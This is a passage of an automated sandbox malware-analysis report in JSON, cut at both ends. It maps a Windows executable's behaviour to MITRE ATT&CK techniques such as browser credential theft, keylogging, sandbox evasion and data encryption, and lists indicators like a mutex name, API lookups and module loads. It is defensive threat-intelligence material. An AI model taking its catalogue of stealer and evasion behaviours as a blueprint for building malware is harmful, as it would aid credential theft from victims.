"https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Rmc-H6V4FW\"\n \"Rmc-H6V4FW\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" file has an entrypoint instructions - \"call\t0x42c7bb,jmp\t0x42c1a5,push\tebp,mov\tebp, esp,push\tesi,push\tdword ptr [ebp + 8],mov\tesi, ecx,call\t0x40962b,mov\tdword ptr [esi], 0x44d608,mov\teax, esi,pop\tesi,pop\tebp,ret\t4,and\tdword ptr [ecx + 4], 0,mov\teax, ecx,and\tdword ptr [ecx + 8], 0,mov\tdword ptr [ecx + 4], 0x44d610,mov\tdword ptr [ecx], 0x44d608,ret\t,push\tebp,mov\tebp, esp,push\tesi,push\tdword ptr [ebp + 8],mov\tesi, ecx,call\t0x40962b,mov\tdword ptr [esi], 0x44d624,mov\teax, esi,pop\tesi,pop\tebp,ret\t4,and\tdword ptr [ecx + 4], 0,mov\teax, ecx,and\tdword ptr [ecx + 8], 0,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetCursorInfo (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetLastInputInfo (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetProcessImageFileNameW (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter SetProcessDpiAwareness (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter NtUnmapViewOfSection (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExW (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter IsUserAnAdmin (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter SetProcessDEPPolicy (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetSystemTimes (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetConsoleWindow (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter NtSuspendProcess (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter NtResumeProcess (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetExtendedTcpTable (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e316b@ADVAPI32.dll\"\n \"0e000f00703f316b@ADVAPI32.dll\"\n \"0e000f00cc3f316b@ADVAPI32.dll\"\n \"11001200b447316b@ADVAPI32.dll\"\n \"110012004848316b@ADVAPI32.dll\"\n \"120013008c48316b@ADVAPI32.dll\"\n \"12001300e448316b@ADVAPI32.dll\"\n \"14001500386e316b@ADVAPI32.dll\"\n \"14001500506e316b@ADVAPI32.dll\"\n \"14001500686e316b@ADVAPI32.dll\"\n \"17001800806e316b@ADVAPI32.dll\"\n \"0d000e00986e316b@ADVAPI32.dll\"\n \"11001200a86e316b@ADVAPI32.dll\"\n \"11001200bc6e316b@ADVAPI32.dll\"\n \"0d000e004466316b@WININET.dll\"\n \"0d000e00b466316b@WININET.dll\"\n \"10001100ec66316b@WININET.dll\"\n \"100011009067316b@WININET.dll\"\n \"10001100006f316b@WININET.dll\"\n \"10001100146f316b@WININET.dll\"\n \"14001500286f316b@WININET.dll\"\n \"14001500406f316b@WININET.dll\"\n \"12001300586f316b@WININET.dll\"\n \"120013006c6f316b@WININET.dll\"\n \"10001100d067316b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has an writable section named \".data\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"USER32.DLL\" at base 76110000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"PSAPI\" at base 762a0000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"SHCORE\" at base 0\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"USER32\" at base 76110000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"NTDLL\" at base 77730000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"KERNEL32\" at base 75970000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"SHELL32\" at base 763c0000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"SHLWAPI\" at base 75b60000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"IPHLPAPI\" at base 73990000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"SSPICLI.DLL\" at base 754c0000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 742c0000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"RPCRT4.DLL\" at base 772d0000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"KERNEL32.DLL\" at base 75970000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75d10000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"SHELL32.DLL\" at base 763c0000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"OLE32.DLL\" at base 775d0000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75000000\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74b60000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter Psapi (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter shcore (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter Shell32 (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter Shlwapi (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter C:\\329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" failed to load missing module \"shcore\" - [base:0; Status:c0000135]\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 772D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: 